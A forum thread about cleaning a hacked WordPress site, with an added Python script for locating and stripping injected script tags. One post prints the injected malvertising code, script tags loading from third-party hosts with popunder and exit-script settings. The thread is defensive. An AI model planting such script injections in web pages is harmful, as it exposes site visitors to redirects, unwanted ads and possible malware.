Clean a site with Malware?

Discussion in 'Programming' started by Thomas Scheetz, Mar 29, 2020.

  1. #1
    Anyone know how to clean a site with malware? My site funny-tshirts.com has it bad and I really can't afford $250 to clean it up.

    Thanks for any help.
     
    Thomas Scheetz, Mar 29, 2020 IP
  2. sarahk

    sarahk iTamer Staff

    #2
    Delete it and restore from backup

    Delete the system files and upload a clean version.

    Go through every file looking for code that is out of place
     
    sarahk, Mar 29, 2020 IP
  3. Thomas Scheetz

    Thomas Scheetz Member

    #3
    It was an old site that hasn't been hosted in almost a year. I just happened to have the files for it, so there isn't really anything I can do when it comes to restoring it. Going through files looking for code wouldn't be practical. I don't think I could "delete the system files and upload clean version". I was on the phone with my host "Host Gator" earlier when we were putting up my site and I think he did that, but it still has the malware.
     
    Thomas Scheetz, Mar 29, 2020 IP
  4. sarahk

    sarahk iTamer Staff

    #4
    If it's an old site and you're not interested in the old content, just delete the lot and start again.
     
    sarahk, Mar 29, 2020 IP
  5. Thomas Scheetz

    Thomas Scheetz Member

    #5
    I'm gonna have to, it looks like, but I wish I didn't have to do all that work again.
     
    Thomas Scheetz, Mar 30, 2020 IP
  6. SpacePhoenix

    SpacePhoenix Well-Known Member

    #6
    Are you sure that you've not got a backup of the files that's known to be clean?

    btw: You should change your FTP password anyway, make sure that the new password is a strong one
     
    SpacePhoenix, Mar 30, 2020 IP
  7. Thomas Scheetz

    Thomas Scheetz Member

    #7
    No backup. My host cleaned a lot of it today. It might be solved, but not sure yet. Site is up, not great, but up. Have to fix a bunch of stuff on it though.
     
    Thomas Scheetz, Mar 30, 2020 IP
  8. qwikad.com

    qwikad.com Illustrious Member Affiliate Manager

    #8
    How long was the wait? A couple of days ago I tried to call regarding one of my sites and the wait was 92 minutes. I hope the whole virus thing is not going to further affect their customer service.
     
    qwikad.com, Mar 30, 2020 IP
  9. Thomas Scheetz

    Thomas Scheetz Member

    #9
    With Host Gator? I've been on the phone with them several times and the wait has only been a couple minutes each time.
     
    Thomas Scheetz, Mar 30, 2020 IP
    qwikad.com likes this.
  10. Thomas Scheetz

    Thomas Scheetz Member

    #10
    So I had to pretty much delete everything on the host and the database and start over. I installed WordPress from scratch. Before I did that, I used the basic tools in WordPress and exported posts, pages, media, etc... I kept all that. When I opened the fresh install of my site, I went ahead and imported those files to see the results. I at least got to keep the main content. Well, it looks like the malware is still there and obviously was in the exported files of my exported pages. It looks like they are in the pages and not the posts and I found the code that is the problem, but I can't tell where it starts and where it stops. Here is the code:

    #pl-2 .panel-grid .panel-grid-cell-mobile-last { margin-bottom:0px }  } </style><script type="text/javascript">
                var adlinkfly_url = 'https://funny-tshirts.com/';
                var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';
                var adlinkfly_advert = 2;
                var adlinkfly_exclude_domains = ['example.com', 'yoursite.com'];
            </script>
            <script src='//cutwin.com/js/full-page-script.js'></script>
            <script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&interactive=1&pushup=1"></script><script type="text/javascript">//<![CDATA[
    (function() {
        var configuration = {
        "token": "11f0dc1ed8453e409e04d86bea962f34",
        "exitScript": {
            "enabled": true
        },
        "popUnder": {
            "enabled": true
        }
    };

    Any idea? Most of this code is in there several times so I'm thinking if I can find where it starts and begins, I could delete it, save the code, and start all over again.
     
    Last edited by a moderator: Mar 30, 2020
    Thomas Scheetz, Mar 30, 2020 IP
  11. sarahk

    sarahk iTamer Staff

    #11
    Unless you know the scripts referred to in lines 7 and 8 are clean I'd get rid of them

    pub2srv looks like it would be an ad publisher but redirects to
    hxxp://cobalten.com/apu.php?zoneid=683723
    and downloads a file with
    empty OK
    go mobisla downloaded a notice.php with this
    empty OK
    but I suspect when called from a webserver both scripts do something very, very nasty.
     
    sarahk, Mar 30, 2020 IP
  12. Thomas Scheetz

    Thomas Scheetz Member

    #12
    Oh yeah, I know that the code in 7 & 8 is definitely malware. I just don't know if I should delete anything before or after that. I'm not a coder, so I don't know how bad it would be or not be if I left incomplete code behind.
     
    Thomas Scheetz, Mar 30, 2020 IP
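
One way to answer the "where does it start and where does it stop" question from posts #10 and #12, as an added example that is not part of the original thread: treat each injected block as a run of back-to-back `<script>` elements and flag the whole run if any element in it loads from a host you do not recognise. The function names, the allowlist and `SAMPLE` are assumptions constructed for illustration, and the regex matching is a heuristic, not a full HTML parser.

```python
import re
from urllib.parse import urlparse

# One whole <script> element; a missing </script> runs to end of input.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)(</script\s*>|\Z)", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

# Constructed sample modelled on the snippet in post #10 (tokens replaced).
SAMPLE = (
    "<style>#pl-2 .panel-grid { margin-bottom:0px }</style>"
    "<script type=\"text/javascript\">\n"
    "    var adlinkfly_api_token = 'PLACEHOLDER';\n"
    "</script>\n"
    "<script src='//cutwin.com/js/full-page-script.js'></script>\n"
    "<script src=\"//go.pub2srv.com/apu.php?zoneid=0\"></script>"
    "<script type=\"text/javascript\">//<![CDATA[\n"
    "(function() { var configuration = {\"token\": \"PLACEHOLDER\"}; })();\n"
    "//]]></script>\n"
    "<p>Funny shirts for everyone.</p>\n"
    "<script src=\"/wp-includes/js/jquery/jquery.js\"></script>\n"
)


def script_runs(html, allowed_hosts):
    """Group back-to-back <script> elements into runs; return the runs that
    load from a host outside allowed_hosts as (start, end, hosts)."""
    runs = []
    for m in SCRIPT_RE.finditer(html):
        src = SRC_RE.search(m.group(1))
        host = (urlparse(src.group(1)).hostname or "") if src else ""
        bad = {host} if host and host not in allowed_hosts else set()
        # Same run when only whitespace separates it from the previous element.
        if runs and not html[runs[-1][1]:m.start()].strip():
            runs[-1] = (runs[-1][0], m.end(), runs[-1][2] | bad)
        else:
            runs.append((m.start(), m.end(), bad))
    return [r for r in runs if r[2]]


def strip_runs(html, runs):
    """Cut flagged runs out, last first so earlier offsets stay valid."""
    for start, end, _hosts in sorted(runs, key=lambda r: r[0], reverse=True):
        html = html[:start] + html[end:]
    return html


if __name__ == "__main__":
    for start, end, hosts in script_runs(SAMPLE, {"funny-tshirts.com"}):
        print(f"injected run at {start}-{end}, hosts: {sorted(hosts)}")
```

Removing a whole run, inline configuration scripts included, leaves no half-deleted script behind; review each flagged run before stripping, since a legitimate third-party script missing from the allowlist is flagged the same way.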
  13. Thomas Scheetz

    Thomas Scheetz Member

    #13
    and these lines make me curious:
    var adlinkfly_api_token = 'f6624368d190e8c1819f49dc4d5fcb633a4d9641';

    "token": "11f0dc1ed8453e409e04d86bea962f34",
     
    Thomas Scheetz, Mar 30, 2020 IP
  14. NetStar

    NetStar Notable Member

    #14
    Clean a site with "malware"? How about you just review the code and remove anything malicious that you didn't write. And if you don't care about the site take it down and move the fuck on.
     
    NetStar, Mar 31, 2020 IP
  15. sarahk

    sarahk iTamer Staff

    #15
    If the work had value the domain wouldn't have been parked for a year, right?

    I've been there, have been paying for a domain for years, the site had been hacked so hosting account was locked and I needed to contact the host's admin and negotiate to have it unlocked. In the end, I decided that none of the content mattered so I deleted it from my reseller panel and added it back in.
     
    sarahk, Mar 31, 2020 IP
  16. NetStar

    NetStar Notable Member

    #16
    Same. And also if you use shared environments expect unexpected guests to infringe. I've had scripts people added code to with ads and redirects. What did I do? 1. Restore my site from current backups. (I have learned to back up the back up and the back and to do this over and over and often). 2. Move out of a shared environment to at least a VPS or cloud account. If your site is important then it's worth the extra money. If you didn't back up your site then go through the code. If you don't have the time then pay someone else. If you don't have the money or the time then you have just realized how unimportant this site is. So take it down and move on.
     
    NetStar, Mar 31, 2020 IP
    sarahk likes this.
  17. georgenbowser

    georgenbowser Well-Known Member

    #17
    Hi Thomas Scheetz,

    I am a WordPress & PHP developer with more than 7 years of experience.

    Your site doesn't have any malware
    https://sitecheck.sucuri.net/results/funny-tshirts.com
    https://www.siteguarding.com/

    you can even check on that
     
    georgenbowser, Apr 27, 2020 IP
  18. LewisH95

    LewisH95 Greenhorn

    #18
    You can use tools that scan your site remotely to find malicious payloads and malware. Sucuri has a free WordPress plugin that you can find in the official WordPress repository.
     
    LewisH95, May 7, 2020 IP